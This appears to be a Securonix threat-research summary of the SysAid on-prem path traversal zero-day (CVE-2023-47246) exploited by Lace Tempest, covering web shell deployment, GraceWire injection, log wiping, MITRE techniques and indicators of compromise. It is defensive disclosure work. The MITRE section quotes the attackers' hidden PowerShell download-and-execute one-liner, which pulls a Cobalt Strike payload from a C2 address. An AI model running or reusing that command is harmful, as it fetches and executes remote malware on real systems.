Threat Research

CVE-2023-47246 Vulnerability – SysAid

Securonix

SysAid’s on-premises software was found to have a zero-day path traversal vulnerability that allowed code execution, exploited by DEV-0950 (Lace Tempest). The attackers deployed a WebShell via a WAR file, loaded the GraceWire loader to inject into system processes, and then used Cobalt Strike for command and control; defenders are urged to patch to 23.3.36 and perform compromise assessments. #SysAid #LaceTempest #GraceWire #CobaltStrike #SysAidOnPrem

Keypoints

  • The issue is a previously unknown path traversal vulnerability in SysAid on-prem software that leads to code execution.
  • The WebShell was uploaded into the SysAid Tomcat web service webroot, enabling attacker control over the affected host.
  • The GraceWire loader was deployed and used to inject into processes such as spoolsv.exe, msiexec.exe, and svchost.exe.
  • A second PowerShell script was used to erase evidence from disks and web logs, hindering incident response.
  • The attackers downloaded and executed a Cobalt Strike agent via PowerShell to establish remote control.
  • The vulnerability and activities were observed by Microsoft Threat Intelligence as linked to DEV-0950 (Lace Tempest); patches are available (23.3.36).
  • Microsoft Defender detections include Trojan:Win32/TurtleLoader, Backdoor:Win32/Clop, and Ransom:Win32/Clop.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The investigation identified a previously unknown path traversal vulnerability leading to code execution within the SysAid on-prem software. Quote: “…path traversal vulnerability leading to code execution within the SysAid on-prem software.”
  • [T1505.003] Web Shell – The attacker uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service. Quote: “The attacker uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service.”
  • [T1055] Process Injection – GraceWire loader injected into spoolsv.exe, msiexec.exe, svchost.exe. Quote: “the GraceWire trojan, injecting it into one of the following processes: spoolsv.exe, msiexec.exe, svchost.exe.”
  • [T1070.001] Clear Windows Event Logs – The attacker erased evidence from disk and SysAid server web logs. Quote: “to erase evidence associated with the attacker’s actions from the disk and the SysAid on-prem server web logs.”
  • [T1059.001] PowerShell – The attack used two PowerShell scripts, including ones to launch the loader and remove evidence. Quote: “PowerShell Used to Launch Malware Loader” and “PowerShell Used to Erase Evidence from Victim Servers.”
  • [T1105] Ingress Tool Transfer – The Cobalt Strike beacon was downloaded and executed via PowerShell: download and execute a CobaltStrike listener. Quote: “Cobalt Strike” command: “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)”

Indicators of Compromise

  • [Hash] b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d – Malicious loader for user.exe
  • [IP] 81.19.138.52 – GraceWire Loader C2
  • [IP] 45.182.189.100 – GraceWire Loader C2
  • [IP] 179.60.150.34 – Cobalt Strike C2
  • [Path] C:Program FilesSysAidServertomcatwebappsusersfilesuser.exe – GraceWire loader
  • [Path] C:Program FilesSysAidServertomcatwebappsusersfiles.war – Archive of WebShells and tools used by the attacker
  • [Path] C:Program FilesSysAidServertomcatwebappsleave – Used as a flag for the attacker scripts during execution

Read more: https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification